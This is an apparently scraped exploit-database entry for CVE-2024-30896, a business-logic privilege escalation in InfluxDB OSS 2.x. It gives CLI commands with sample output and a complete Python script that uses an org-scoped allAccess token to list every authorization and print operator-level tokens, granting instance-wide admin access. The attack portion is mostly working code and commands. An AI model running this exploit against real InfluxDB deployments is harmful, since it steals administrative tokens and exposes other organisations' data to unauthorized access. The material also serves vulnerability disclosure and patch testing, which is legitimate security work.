<\/p>\n
# Exploit Title: InfluxDB OSS Operator Privilege Escalation via BusinessLogic Flaw
\n# Date: 22\/03\/2024
\n# Exploit Author: Andrea Pasin (Xenom0rph97)
\n# Researcher Homepage: https:\/\/xenom0rph97.github.io\/xeno\/
\n# GitHub Exploit repo: https:\/\/github.com\/XenoM0rph97\/CVE-2024-30896
\n# Software Link: https:\/\/www.influxdata.com\/products\/influxdb\/
\n# Version: 2.x 2.7.11
\n# Tested on: InfluxDB OSS 2.x
\n# CVE: CVE-2024-30896
\n# CVSS Base Score: 9.1
\n# CVSS v3.1 Vector: AV:N\/AC:L\/PR:H\/UI:N\/S:C\/C:H\/I:H\/A:H
\n
\n# CVE-2024-30896
\n
\n## Summary
\nA business logic flaw in influxdb allows users who own a valid allAccess
\ntoken to escalate their privileges at operator level by listing current
\nauthorization tokens.
\n
\n## Scenario
\nAttacker might be a user which was gained access by an administrator via an
\nallAccess token only within their organization.
\nThis user's permissions will allow full control over the organization but
\nwill still prevent him to interact with other orgs.
\n
\n## Impact
\nThis vulnerability would allow a user to obtain unrestricted access to the
\ninfluxdb instance. A similar condition might fully compromise
\nConfidentiality, Integrity and Availability of data owned by users of
\ndifferent organizations. Additionally, since operator token has
\nadministrative permissions, Availability and Integrity of the entire
\ninfluxdb instance might be compromised.
\n
\n## Prerequisites\/Limitations
\n1. Attacker must have a valid allAccess token
\n2. allAccess token must have been created in the same Org where an operator
\ntoken resides (ex. same Org as Admin user)
\n3. Attacker must be able to interact with influxdb instance via CLI or APIs
\n(influxClient)
\n
\n## Steps to Reproduce
\n### Case 1: Exploitation via influxdb APIs:
\n*Python Version*: 3
\n*Requirements*: `influxdb_client==1.41.0`
\n*Script usage*
\n```
\n% python3 .\/CVE-2024-30896.py -h
\nusage: CVE-2024-30896.py [-h] [-t TOKEN] [-e ENDPOINTURL] [-v [VERBOSE]]
\n[-vv [VVERBOSE]]
\n
\noptional arguments:
\n-h, --help show this help message and exit
\n-t TOKEN, --token TOKEN
\nCustom or allAccess token to access influx DB
\ninstance
\n-e ENDPOINTURL, --endpointUrl ENDPOINTURL
\nEndpoint Url of influxdb instance (ex. \"
\nhttps:\/\/myInfluxdbInstance:8086\/\")
\n-v [VERBOSE], --verbose [VERBOSE]
\nEnable verbose logging - INFO
\n-vv [VVERBOSE], --vverbose [VVERBOSE]
\nEnable verbose logging - DEBUG
\n```
\n
\n### Case 2: Exploitation via influx CLI
\n1. Execute: `influx auth ls -t | grep write:\/orgs`. This
\nwill list all current active operator tokens on the influxdb instance.
\n
\n*Example*
\n```
\n# Using an allAccess token
\ninflux auth ls -t U1OuqmFC{REDACTED} | grep U1OuqmFC{REDACTED}
\n
\n0cc41c3b050e5000 U1OuqmFC{REDACTED}
\nadmin 0cb9c92ee228b000 [read:orgs\/87d0746948a3b3f5\/authorizations
\nwrite:orgs\/87d0746948a3b3f5\/authorizations
\nread:orgs\/87d0746948a3b3f5\/buckets write:orgs\/87d0746948a3b3f5\/buckets
\nread:orgs\/87d0746948a3b3f5\/dashboards
\nwrite:orgs\/87d0746948a3b3f5\/dashboards read:\/orgs\/87d0746948a3b3f5
\nread:orgs\/87d0746948a3b3f5\/sources write:orgs\/87d0746948a3b3f5\/sources
\nread:orgs\/87d0746948a3b3f5\/tasks write:orgs\/87d0746948a3b3f5\/tasks
\nread:orgs\/87d0746948a3b3f5\/telegrafs write:orgs\/87d0746948a3b3f5\/telegrafs
\nread:\/users\/0cb9c92ee228b000 write:\/users\/0cb9c92ee228b000
\nread:orgs\/87d0746948a3b3f5\/variables write:orgs\/87d0746948a3b3f5\/variables
\nread:orgs\/87d0746948a3b3f5\/scrapers write:orgs\/87d0746948a3b3f5\/scrapers
\nread:orgs\/87d0746948a3b3f5\/secrets write:orgs\/87d0746948a3b3f5\/secrets
\nread:orgs\/87d0746948a3b3f5\/labels write:orgs\/87d0746948a3b3f5\/labels
\nread:orgs\/87d0746948a3b3f5\/views write:orgs\/87d0746948a3b3f5\/views
\nread:orgs\/87d0746948a3b3f5\/documents write:orgs\/87d0746948a3b3f5\/documents
\nread:orgs\/87d0746948a3b3f5\/notificationRules
\nwrite:orgs\/87d0746948a3b3f5\/notificationRules
\nread:orgs\/87d0746948a3b3f5\/notificationEndpoints
\nwrite:orgs\/87d0746948a3b3f5\/notificationEndpoints
\nread:orgs\/87d0746948a3b3f5\/checks write:orgs\/87d0746948a3b3f5\/checks
\nread:orgs\/87d0746948a3b3f5\/dbrp write:orgs\/87d0746948a3b3f5\/dbrp
\nread:orgs\/87d0746948a3b3f5\/notebooks write:orgs\/87d0746948a3b3f5\/notebooks
\nread:orgs\/87d0746948a3b3f5\/annotations
\nwrite:orgs\/87d0746948a3b3f5\/annotations read:orgs\/87d0746948a3b3f5\/remotes
\nwrite:orgs\/87d0746948a3b3f5\/remotes read:orgs\/87d0746948a3b3f5\/replications
\nwrite:orgs\/87d0746948a3b3f5\/replications]
\n
\n# Listing all available tokens passing allAccess token and retrieving only
\noperator level tokens
\ninflux auth ls -t U1OuqmFC{REDACTED} | grep write:\/orgs
\n
\n0cbb920e128e5000 gerKYLO0Ph_ibUk0y{REDACTED}
\nadmin 0cb9c92ee228b000 [read:\/authorizations write:\/authorizations
\nread:\/buckets write:\/buckets read:\/dashboards write:\/dashboards read:\/orgs
\nwrite:\/orgs read:\/sources write:\/sources read:\/tasks write:\/tasks
\nread:\/telegrafs write:\/telegrafs read:\/users write:\/users read:\/variables
\nwrite:\/variables read:\/scrapers write:\/scrapers read:\/secrets
\nwrite:\/secrets read:\/labels write:\/labels read:\/views write:\/views
\nread:\/documents write:\/documents read:\/notificationRules
\nwrite:\/notificationRules read:\/notificationEndpoints
\nwrite:\/notificationEndpoints read:\/checks write:\/checks read:\/dbrp
\nwrite:\/dbrp read:\/notebooks write:\/notebooks read:\/annotations
\nwrite:\/annotations read:\/remotes write:\/remotes read:\/replications
\nwrite:\/replications]
\n
\ninfluxdb_client==1.41.0
\n
\nimport influxdb_client
\nimport argparse
\nimport logging
\nimport sys
\n
\nargParser = argparse.ArgumentParser()
\nargParser.add_argument(\"-t\", \"--token\", type=str, help=\"Custom or allAccess token to access influx DB instance\")
\nargParser.add_argument(\"-e\", \"--endpointUrl\", type=str, help=\"Endpoint Url of influxdb instance (ex. \\\"https:\/\/myInfluxdbInstance:8086\/\\\")\")
\nargParser.add_argument(\"-v\", \"--verbose\", type=bool, const=True, nargs='?', help=\"Enable verbose logging - INFO\")
\nargParser.add_argument(\"-vv\", \"--vverbose\", type=bool, const=True, nargs='?', help=\"Enable verbose logging - DEBUG\")
\n
\nargs = argParser.parse_args()
\n
\n# Using user retrieved values or default (hardcoded) ones
\nall_access_token = \"\"
\ninflux_endpoint_url = \"\"
\n
\n# Defining some colors
\nred = \"\\033[31m\"
\nyellow = \"\\033[93m\"
\npurple = \"\\33[1;95m\"
\ngreen = \"\\033[0;92m\"
\ncyan = \"\\033[96m\"
\nbold =\"\\033[1m\"
\nendc = \"\\033[39m\"
\n
\nif args.vverbose == True:
\n logging.basicConfig(level=logging.DEBUG)
\nelif args.verbose == True:
\n logging.basicConfig(level=logging.INFO)
\n
\nlogger = logging.getLogger()
\n
\nif args.token:
\n token = args.token
\nelse:
\n logger.debug(f\"{yellow}User did not set a token, using default one{endc}\")
\n token = all_access_token
\n
\nif args.endpointUrl:
\n endpointUrl = args.endpointUrl
\nelse:
\n logger.debug(f\"{yellow}User did not set an endpoint Url for influxdb, using default one{endc}\")
\n endpointUrl = influx_endpoint_url
\n
\nlogger.info(f\"{cyan}Connecting to influx DB instance{endc}\")
\n# Connecting to influxdb instance
\ntry:
\n conn = influxdb_client.InfluxDBClient(
\n url=endpointUrl,
\n token=token,
\n debug=False,
\n verify_ssl=True
\n )
\n
\n # Verify InfluxDB connection
\n health = conn.ping()
\n if not health:
\n logger.error(f\"{red}Unable to connect to db instace \" + endpointUrl + f\"{endc}\")
\n print(f\"{red}Quitting execution...{endc}\")
\n sys.exit(1)
\n
\nexcept Exception as e:
\n logger.error(f\"{red}Failed to connect to db instance: \" + endpointUrl + \" Error: \" + str(e) + f\"{endc}\")
\n print(f\"{red}Quitting execution...{endc}\")
\n sys.exit(1)
\n
\n# Retrieving all current auths
\nlogger.debug(f\"{yellow}Retrieving all auth tokens{endc}\")
\nprint(f\"{cyan}Enumerating current authorizations...{endc}\")
\ntry:
\n auths = conn.authorizations_api().find_authorizations()
\nexcept Exception as e:
\n logger.error(f\"{red}Unable to retrieve authorizations. ERR: \" + str(e) +f\"{endc}\")
\n print(f\"{red}Unable to retrieve authorizations. Quitting...{endc}\")
\n sys.exit(1)
\nif not auths:
\n print(f\"{cyan}No Authorization tokens found on the instance{endc}\")
\n sys.exit(1)
\nprint(f\"{cyan}{str(len(auths))} tokens found on the instance{endc}\\n\")
\n# Extracting operator token -> Parsing permissions to look for (\"org = None\" and \"authType = write\/auths\"), not 100% efficiency -> TO OPTIMIZE
\nlogger.debug(f\"{yellow}Parsing auth permissions to retrieve operator tokens{endc}\")
\nprint(f\"{cyan}Enumerating all operator tokens:{endc}\")
\nop_tokens = []
\n# In order to understand if a token is of type \"operator\" we need to enumerate all permissions and look for \"write\/auths\" on org 'None' -> Unrescticted access
\ntry:
\n for auth in auths:
\n if auth.permissions:
\n for perm in auth.permissions:
\n if perm.action == \"write\" and perm.resource.org == None and perm.resource.type == \"authorizations\":
\n op_tokens.append(auth.token)
\nexcept Exception as e:
\n logger.error(f\"{red}Unable to parse permissions on found authorizations. ERR: \" + str(e) + f\"{endc}\")
\n print(f\"{red}Unable to parse permissions on found authorizations. Quitting execution...{endc}\")
\n sys.exit(1)
\n
\nlogger.info(f\"{cyan}Printing all operator auth tokens{endc}\")
\nprint(f\"{cyan}{str(len(op_tokens))} operator tokens found.\\n\\nListing all operator tokens:\\n{endc}\")
\nfor op_t in op_tokens:
\n print(f\"{green}{op_t}{endc}\")\n <\/influxdbendpointurl><\/allaccesstoken><\/allaccesstoken><\/code><\/pre>\n<\/p><\/div>\n